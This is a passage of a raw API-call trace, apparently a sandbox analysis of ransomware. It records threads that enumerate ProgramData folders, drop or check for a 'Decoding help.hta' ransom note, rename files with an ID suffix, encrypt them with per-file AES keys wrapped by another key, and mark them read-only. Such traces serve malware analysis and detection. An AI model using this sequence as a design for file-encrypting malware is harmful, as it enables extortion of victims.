ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x22f18830, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x677, dwReserved0=0x0, dwReserved1=0x0, cFileName="jaureglist.xml.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="JAUREG~1._ID")) returned 0 [0049.083] FindClose (in: hFindFile=0x671f30 | out: hFindFile=0x671f30) returned 1 Thread: id = 551 os_tid = 0xce0 [0047.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*", lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671e30 [0047.501] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.501] FindNextFileW (in: hFindFile=0x671e30, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.501] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.501] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.502] FindNextFileW (in: hFindFile=0x671e30, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de525d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2caa5f40, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40270, dwReserved0=0x0, dwReserved1=0x0, cFileName="cache.dat", cAlternateFileName="")) returned 1 [0049.096] lstrcpyW (in: lpString1=0x987a788, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*" [0049.096] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*") returned 71 [0049.096] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\Decoding help.hta" [0049.096] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\decoding help.hta")) returned 0x2020 [0051.013] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cache.dat") returned 1 [0051.013] lstrlenW (lpString="cache.dat") returned 9 [0051.013] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*" [0051.014] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*") returned 71 [0051.014] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\", lpString2="cache.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" [0051.014] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" [0051.014] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0051.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.457] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0056.457] CreateFileMappingA (hFile=0x5a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x240 [0056.457] CryptAcquireContextA (in: phProv=0x558fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x558fcec*=0x3449bd8) returned 1 [0059.944] CryptGenKey (in: hProv=0x3449bd8, Algid=0x6610, dwFlags=0x1, phKey=0x558fce8 | out: phKey=0x558fce8*=0x5da478) returned 1 [0059.944] CryptExportKey (in: hKey=0x5da478, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x558fbe4, pdwDataLen=0x558fce4 | out: pbData=0x558fbe4*, pdwDataLen=0x558fce4*=0x2c) returned 1 [0059.944] MapViewOfFile (hFileMappingObject=0x240, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x40260) returned 0x49e0000 [0059.959] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x558fbe4*, pdwDataLen=0x558fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x558fbe4*, pdwDataLen=0x558fcf8*=0x100) returned 1 [0059.960] CryptEncrypt (in: hKey=0x5da478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x49e0000, pdwDataLen=0x558fce4*=0x40260, dwBufLen=0x40260 | out: pbData=0x49e0000*, pdwDataLen=0x558fce4*=0x40260) returned 1 [0060.034] UnmapViewOfFile (lpBaseAddress=0x49e0000) returned 1 [0060.039] CloseHandle (hObject=0x240) returned 1 [0060.039] CryptDestroyKey (hKey=0x5da478) returned 1 [0060.039] CryptReleaseContext (hProv=0x3449bd8, dwFlags=0x0) returned 1 [0060.039] SetFilePointerEx (in: hFile=0x5a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.039] WriteFile (in: hFile=0x5a8, lpBuffer=0x558fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x558fcf8, lpOverlapped=0x0 | out: lpBuffer=0x558fbe4*, lpNumberOfBytesWritten=0x558fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.433] WriteFile (in: hFile=0x5a8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x558fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x558fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.433] CloseHandle (hObject=0x5a8) returned 1 [0061.433] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.433] FindNextFileW (in: hFindFile=0x671e30, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de525d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2caa5f40, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40270, dwReserved0=0x0, dwReserved1=0x0, cFileName="cache.dat", cAlternateFileName="")) returned 0 [0061.433] FindClose (in: hFindFile=0x671e30 | out: hFindFile=0x671e30) returned 1 Thread: id = 552 os_tid = 0xce4 [0048.246] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*.*", lpFindFileData=0x11adfd30 | out: lpFindFileData=0x11adfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db7f8 [0048.246] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.246] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0x11adfd30 | out: lpFindFileData=0x11adfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.246] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.246] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.247] FindNextFileW (in: hFindFile=0x5db7f8, lpFindFileData=0x11adfd30 | out: lpFindFileData=0x11adfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0048.247] FindClose (in: hFindFile=0x5db7f8 | out: hFindFile=0x5db7f8) returned 1 Thread: id = 553 os_tid = 0xce8 [0048.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*.*", lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfc64e30, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6714b0 [0048.284] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.284] FindNextFileW (in: hFindFile=0x6714b0, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfc64e30, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.284] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.284] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.284] FindNextFileW (in: hFindFile=0x6714b0, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfcb10f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 1 [0049.196] lstrcpyW (in: lpString1=0x11173bc8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*.*" [0049.196] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*.*") returned 50 [0049.196] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\Decoding help.hta" [0049.196] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\decoding help.hta")) returned 0x2020 [0051.012] lstrcmpiW (lpString1="Decoding help.hta", lpString2="RacWmiDatabase.sdf") returned -1 [0051.012] lstrlenW (lpString="RacWmiDatabase.sdf") returned 18 [0051.012] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*.*" [0051.012] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*.*") returned 50 [0051.012] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\", lpString2="RacWmiDatabase.sdf" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" [0051.012] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" [0051.012] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]" [0051.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0052.059] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x60c [0052.059] CreateFileMappingA (hFile=0x60c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6cc [0052.059] CryptAcquireContextA (in: phProv=0x3e4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3e4fcec*=0x3449e80) returned 1 [0054.910] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x3e4fce8 | out: phKey=0x3e4fce8*=0x5d8010) returned 1 [0054.910] CryptExportKey (in: hKey=0x5d8010, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x3e4fbe4, pdwDataLen=0x3e4fce4 | out: pbData=0x3e4fbe4*, pdwDataLen=0x3e4fce4*=0x2c) returned 1 [0054.910] MapViewOfFile (hFileMappingObject=0x6cc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25000) returned 0x550000 [0054.913] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e4fbe4*, pdwDataLen=0x3e4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x3e4fbe4*, pdwDataLen=0x3e4fcf8*=0x100) returned 1 [0054.913] CryptEncrypt (in: hKey=0x5d8010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000, pdwDataLen=0x3e4fce4*=0x25000, dwBufLen=0x25000 | out: pbData=0x550000*, pdwDataLen=0x3e4fce4*=0x25000) returned 1 [0054.916] UnmapViewOfFile (lpBaseAddress=0x550000) returned 1 [0054.919] CloseHandle (hObject=0x6cc) returned 1 [0054.919] CryptDestroyKey (hKey=0x5d8010) returned 1 [0054.919] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0054.919] SetFilePointerEx (in: hFile=0x60c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.919] WriteFile (in: hFile=0x60c, lpBuffer=0x3e4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3e4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x3e4fbe4*, lpNumberOfBytesWritten=0x3e4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.958] WriteFile (in: hFile=0x60c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x3e4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x3e4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.958] CloseHandle (hObject=0x60c) returned 1 [0056.958] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.529] FindNextFileW (in: hFindFile=0x6714b0, lpFindFileData=0x3e4fd30 | out: lpFindFileData=0x3e4fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xfc64e30, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfcb10f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0058.529] FindClose (in: hFindFile=0x6714b0 | out: hFindFile=0x6714b0) returned 1 Thread: id = 554 os_tid = 0xcec [0048.321] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*", lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80366a76, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80366a76, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671170 [0049.774] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.774] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80366a76, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80366a76, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.774] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.774] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.774] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae24f474, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae24f474, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xda0a8861, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile10.bmp", cAlternateFileName="")) returned 1 [0050.103] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0050.103] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0050.103] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0050.103] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.979] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile10.bmp") returned -1 [0053.979] lstrlenW (lpString="usertile10.bmp") returned 14 [0053.979] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.979] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.980] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile10.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" [0053.980] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" [0053.980] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.980] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile10.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.980] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae24f474, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae24f474, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb5a2927, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile11.bmp", cAlternateFileName="")) returned 1 [0053.980] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.981] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account 